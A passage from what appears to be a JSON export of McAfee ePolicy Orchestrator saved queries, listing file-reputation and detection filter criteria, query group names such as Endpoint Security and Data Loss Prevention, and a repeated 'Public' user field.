Installer or GTI Reputation Equals Known Trusted or GTI Reputation Equals Most Likely Trusted or GTI Reputation Equals Might be Trusted))\\\",\\r\\n\\t\\t\\t\\\"Insertion Time (UTC) Is within the last 4 Weeks\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"((Enterprise Reputation Equals Known Trusted Installer or Enterprise Reputation Equals Known Trusted or Enterprise Reputation Equals Most Likely Trusted or Enterprise Reputation Equals Might be Trusted) and (GTI Reputation Equals Might be Malicious or GTI Reputation Equals Most Likely Malicious or GTI Reputation Equals Known Malicious))\\\",\\r\\n\\t\\t\\t\\\"(((Composite Reputation Equals Unknown or Composite Reputation Equals Not Set) and Certificate SHA-1 Value is blank ) and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(First contact Is within the last 6 Months and Composite Reputation Equals Unknown and Last access Is within the last 1 Weeks and Certificate SHA-1 Value is blank )\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is 
within the last 1 Months and Certificate SHA-1 Value is blank )\\\",\\r\\n\\t\\t\\t\\\"(File Parent Value is not blank and Composite Reputation Equals Unknown and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months and Local Reputation Count Greater than 10 )\\\",\\r\\n\\t\\t\\t\\\"Date Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"(((Composite Reputation Equals Unknown or Composite Reputation Equals Not Set) and Certificate SHA-1 Value is not blank and Enterprise Count Greater than 0 ) and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(First contact Is within the last 1 Months and Certificate SHA-1 Value is not blank and Composite Reputation Equals Unknown and Enterprise Count Greater than 0 )\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months and Certificate SHA-1 Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months and Certificate SHA-1 Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Last Update Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"Last Update Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Undefined Device Classes List Value is not blank \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Is Chrome Version supported Equals Unsupported\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals GTI Certificate and Modified Date Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"Date Is within the last 1 Weeks\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals GTI File and Create Date Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"(((Reputation Equals Known Malicious or Reputation Equals Might be Malicious or Reputation Equals Most Likely Malicious or Reputation Equals 
Unknown or Reputation Equals Not Set) and Reputation Provider Equals GTI File) and Create Date Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals Enterprise File and Reputation Count Greater than 0 )\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals GTI File and Modified Date Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"Date Is within the last 1 Weeks\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Executed Equals 1 \\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Known Malicious and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Last access Is within the last 1 Months and Composite Reputation Equals Known Malicious)\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Known Malicious and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Usage Month Is within the last 6 Months and Cloud Provider Does not equal \\\\\\\"vCenter.vendor\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 1 Days and (Analyzer Detection Method Equals \\\\\\\"Real Protect Client\\\\\\\" or Analyzer Detection Method Equals \\\\\\\"Real Protect Cloud\\\\\\\"))\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 1 Weeks and (Analyzer Detection Method Equals \\\\\\\"Real Protect Client\\\\\\\" or Analyzer Detection Method Equals \\\\\\\"Real Protect Cloud\\\\\\\"))\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 1 Months and (Analyzer Detection Method Equals \\\\\\\"Real Protect Client\\\\\\\" or Analyzer Detection Method Equals \\\\\\\"Real Protect Cloud\\\\\\\"))\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 1 Quarters and (Analyzer 
Detection Method Equals \\\\\\\"Real Protect Client\\\\\\\" or Analyzer Detection Method Equals \\\\\\\"Real Protect Cloud\\\\\\\"))\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\"\\r\\n\\t\\t]\"",
    "groupName": "\"[\\r\\n\\t\\t\\t\\\"Permissions\\\",\\r\\n\\t\\t\\t\\\"Permissions\\\",\\r\\n\\t\\t\\t\\\"Permissions\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent 
Management\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint 
Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint 
Security\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange 
Server\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"New Group\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Data Center\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange 
Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"New Group\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange Server\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Public Cloud\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint 
Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\"\\r\\n\\t\\t]\"",
    "userName": "\"[\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",
\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"P
